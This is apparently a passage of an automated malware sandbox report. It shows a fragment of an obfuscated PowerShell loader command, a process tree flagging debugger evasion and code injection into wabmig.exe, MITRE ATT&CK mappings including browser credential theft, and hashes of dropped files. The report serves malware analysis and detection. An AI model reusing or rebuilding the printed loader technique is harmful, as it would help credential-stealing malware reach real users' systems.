poseSalmnArbis Use Stub= Te Nucl[HatrSSlakyGthes lgetProteSoupmUdkl.N,ncCBallo ulrnPedovdrivePla rAkslt,erv] Act:Sals:Ca.eFJowtrMesaoCommmT leBLizzastumsRecreDiff6 Bal4BoobSvilkt,etrrSterich onHyp,gKuld(Begu$N taDHejsaJu,ks fi,hSkydpPilol ameaPal tTo.ae Sil)Sm g ');Hvsningen (Concomitancy2 'Bogk$Lurkgreg l ensoAs rbAngeaKronlC ar: ClapDukke Kaar pvkmNecei DepnT.oggT ec Opst=Sipp Bnn[Ai iSAnkry eldsWarst U vescenmSnne. s cT FreeFlovxHerot U o. rotEHoven skec Bl.o SchdDetaiBliknTr,agSemi]Slav:Deme: BadAMoleSB saCNonfIGiraIStem. SulGDyrlegengtselvSDamptS.rerPergi Skrnscrag Cym(Folk$IsopTVerseGeorkBenzsdksottoboiClapl UndiUno nMatrdBlakuPerls LditBonarCosiimanieRacen NedsO.ot)Bonn ');Hvsningen (Concomitancy2 ' Cir$ spogTjhulP,roo Guyb,esiaTel l Sam:CobbDGener xcu Id k Dann Pl eOpfidKetudProgsIdio= Unc$syripBemjecut rAccemCribi SinnReskg D a.Sys,sfortuGoatbB gmsU,ectGuitrSa diEquan La,gBage( .je$AmaaATsa d AutrBidee Imis Gars rseeEntab Fore edar C reTereg Ca n F ei,rernCo fgBegieFu rrbannsSubs,Katt$Mu cFBergeStonrHaltiTum eCen fDowfoVkstnBethd Dac) G,w ');Hvsningen $Druknedds;"
      4⤵
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of SetThreadContext
      System Location Discovery: System Language Discovery
      Suspicious behavior: CmdExeWriteProcessMemorySpam
      Suspicious behavior: EnumeratesProcesses
      Suspicious behavior: MapViewOfSection
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:1232
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Varmefordeling.Rds && echo t"
        5⤵
        System Location Discovery: System Language Discovery
        
        PID:2976
    - - C:\Program Files (x86)\windows mail\wabmig.exe
        
        "C:\Program Files (x86)\windows mail\wabmig.exe"
        5⤵
        Suspicious use of NtCreateThreadExHideFromDebugger
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2960

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

1

T1555

Credentials from Web Browsers

1

T1555.003

Discovery

System Information Discovery

1

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
ccd8b6e7d7935b7d6c851fe3a6f5bcc9

SHA1
99e50b9390b14b5b61d44c22cb18615c9331989f

SHA256
7efcfd2133e93c95bc552d65a521e4abf791a8c7458ed680fd3f078c3679cfb3

SHA512
45215f38d3ee5617fef3423306133cb85623e1927cfcbb2d3df87e16151e75bd15a6628fe79a514a4e2929ed58894a0e85ca1b68ffe86b2b1ccfc2d715fbd251

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab9E54.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar1E1C.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\ADF5L71IISERTLFOTHHS.temp

Filesize
7KB

MD5
90ad0e5451db428ba6e1bf745fadf681

SHA1
bf449a1218849045a654431cd1e7dfd61f4e40fa

SHA256
80abadf4ff46ecc67478306d3007fcedddcfd2d06665fcaa2b271765cd7f88f0

SHA512
aedcce8bd687ce926cb974082bcd30a34dbfb1491e70ff572f17dd870c40d7184521d1ebcbae870adcecb1b539ae70a6434eb0595d3cdffb81510ad356a6fa27

Download Submit
C:\Users\Admin\AppData\Roaming\Varmefordeling.Rds

Filesize
423KB

MD5
bcb5d8ebc641f888c81ac3120a8b528d

SHA1
e8aba2dd4bded85617590e106698c73dd5930aaa

SHA256
5e34c719ce17f317f0101640de71e99a4733fceff40a087559eb7c60ccca739f

SHA512
41ca115f78e7c03931f5b43c26464a6e06349d171fd5569171515b405f18240dba103c059c0dda498cfec1aa3b57ecb07eae3cf371ee1af1d5ae190a3141b1b2

Download Submit
memory/1232-33-0x00000000066F0000-0x000000000A620000-memory.dmp

Filesize
63.2MB

Download
memory/2620-28-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2620-27-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-25-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-24-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-23-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2620-22-0x0000000001E50000-0x0000000001E58000-memory.dmp

Filesize
32KB

Download
memory/2620-21-0x000000001B5E0000-0x000000001B8C2000-memory.dmp

Filesize
2.9MB

Download
memory/2620-20-0x000007FEF62BE000-0x000007FEF62BF000-memory.dmp

Filesize
4KB

Download
memory/2620-61-0x000007FEF6000000-0x000007FEF699D000-memory.dmp

Filesize
9.6MB

Download
memory/2960-34-0x0000000001870000-0x00000000057A0000-memory.dmp

Filesize
63.2MB

Download
memory/2960-58-0x0000000000800000-0x0000000001862000-memory.dmp

Filesize
16.4MB

Download
memory/2960-59-0x0000000000800000-0x0000000001862000-memory.dmp

Filesize
16.4MB

Download
memory/2960-60-0x0000000000800000-0x0000000000840000-memory.dmp

Filesize
256KB

Download

Analysis

Sharing